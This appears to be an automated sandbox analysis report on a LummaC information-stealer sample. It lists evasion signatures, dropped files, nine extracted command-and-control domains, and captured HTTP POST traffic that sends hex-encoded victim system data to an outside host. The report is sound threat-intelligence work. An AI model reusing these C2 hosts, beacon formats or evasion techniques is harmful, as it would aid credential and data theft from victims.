Edit tour

Windows Analysis Report
OAKPYEH4c6.exe

Overview

General Information

Sample name:	OAKPYEH4c6.exe renamed because original name is a hash value
Original sample name:	e005ba79c9ed37cf2f37fd4dd51fc287.exe
Analysis ID:	1581389
MD5:	e005ba79c9ed37cf2f37fd4dd51fc287
SHA1:	efbebac49553150c0b53f173ed5ec56d6977754a
SHA256:	147e5a90a4aa996af89ed826f3ce38c8626fe94a291568c45c8df009f9f4b814
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

OAKPYEH4c6.exe (PID: 1736 cmdline: "C:\Users\user\Desktop\OAKPYEH4c6.exe" MD5: E005BA79C9ED37CF2F37FD4DD51FC287)

LummaC2.exe (PID: 1632 cmdline: "C:\Users\user\AppData\Local\Temp\LummaC2.exe" MD5: 607000C61FCB5A41B8D511B5ED7625D4)

Set-up.exe (PID: 6964 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["censeractersj.click", "wordyfindy.lat", "manyrestro.lat", "tentabatte.lat", "slipperyloo.lat", "bashfulacid.lat", "shapestickyr.lat", "talkynicer.lat", "curverpluch.lat"], "Build id": "Fppr10--Indus2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.OAKPYEH4c6.exe.ee0000.0.unpack	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x6d30d2:$s1: Runner 0x6d3237:$s3: RunOnStartup 0x6d30e6:$a1: Antis 0x6d3113:$a2: antiVM 0x6d311a:$a3: antiSandbox 0x6d3126:$a4: antiDebug 0x6d3130:$a5: antiEmulator 0x6d313d:$a6: enablePersistence 0x6d314f:$a7: enableFakeError 0x6d3260:$a8: DetectVirtualMachine 0x6d3285:$a9: DetectSandboxie 0x6d32b0:$a10: DetectDebugger 0x6d32bf:$a11: CheckEmulator

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: OAKPYEH4c6.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Avira URL Cloud: Label: malware
Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.2765823820.00000000012C9000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["censeractersj.click", "wordyfindy.lat", "manyrestro.lat", "tentabatte.lat", "slipperyloo.lat", "bashfulacid.lat", "shapestickyr.lat", "talkynicer.lat", "curverpluch.lat"], "Build id": "Fppr10--Indus2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: OAKPYEH4c6.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: OAKPYEH4c6.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: bashfulacid.lat
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: tentabatte.lat
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: curverpluch.lat
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: talkynicer.lat
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: shapestickyr.lat
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: manyrestro.lat
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: slipperyloo.lat
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: wordyfindy.lat
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: censeractersj.click
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.2765649941.0000000000AA0000.00000002.00000001.01000000.00000007.sdmp	String decryptor: Fppr10--Indus2

Source: OAKPYEH4c6.exe, 00000000.00000002.1572012158.000000000789F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_feda80fc-c

Source: OAKPYEH4c6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_00A9C59C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	2_2_00A9EEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	2_2_00A9EEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_00A890B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]	2_2_00A890B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_00A78095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_00A8C894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push esi	2_2_00A810F3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	2_2_00A9E8D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	2_2_00A9A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	2_2_00A9A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	2_2_00A9A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_00A9A800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	2_2_00A9B813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [esi], cl	2_2_00A8B078
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	2_2_00A9F040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	2_2_00A9F040
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]	2_2_00A859B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_00A8C984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_00A7D189
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then call dword ptr [00AA1DB0h]	2_2_00A6D196
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_00A8C9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	2_2_00A8C9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_00A7D172
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	2_2_00A9D140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]	2_2_00A9DAA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]	2_2_00A88290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_00A74AEA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov eax, ecx	2_2_00A74AEA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebp, dword ptr [esp+20h]	2_2_00A74AEA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_00A74AEA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	2_2_00A74AEA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_00A792C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then and esi, 80000000h	2_2_00A68A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]	2_2_00A86230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, edx	2_2_00A7720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]	2_2_00A7720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h	2_2_00A9DBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]	2_2_00A6D35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h	2_2_00A9BC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_00A9BC14
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	2_2_00A9B46A
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	2_2_00A7CC60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_00A67440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	2_2_00A67440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00A89DA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, ecx	2_2_00A6EDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_00A6EDB4
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov word ptr [ebx], cx	2_2_00A7AD81
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp]	2_2_00A97D00
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, ecx	2_2_00A7D560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov esi, eax	2_2_00A76D52
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-00B3ED90h]	2_2_00A8B695
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	2_2_00A746C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_00A866C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp edx	2_2_00A826D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edx, eax	2_2_00A9BCDB
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	2_2_00A88640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh	2_2_00A97790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then push dword ptr [esp+04h]	2_2_00A97790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then jmp eax	2_2_00A83FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov edi, dword ptr [esp+30h]	2_2_00A83FF1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 4x nop then mov ecx, eax	2_2_00A8BF45

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: censeractersj.click
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: curverpluch.lat

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 534468Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 31 38 37 30 33 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /
Source: global traffic	HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

Source: Joe Sandbox View	IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View	IP Address: 34.226.108.155 34.226.108.155

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: /

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fortth14ht.top

Source: unknown

HTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 534468Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 32 38 39 37 34 38 30 38 36 34 33 31 38 37 30 33 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c

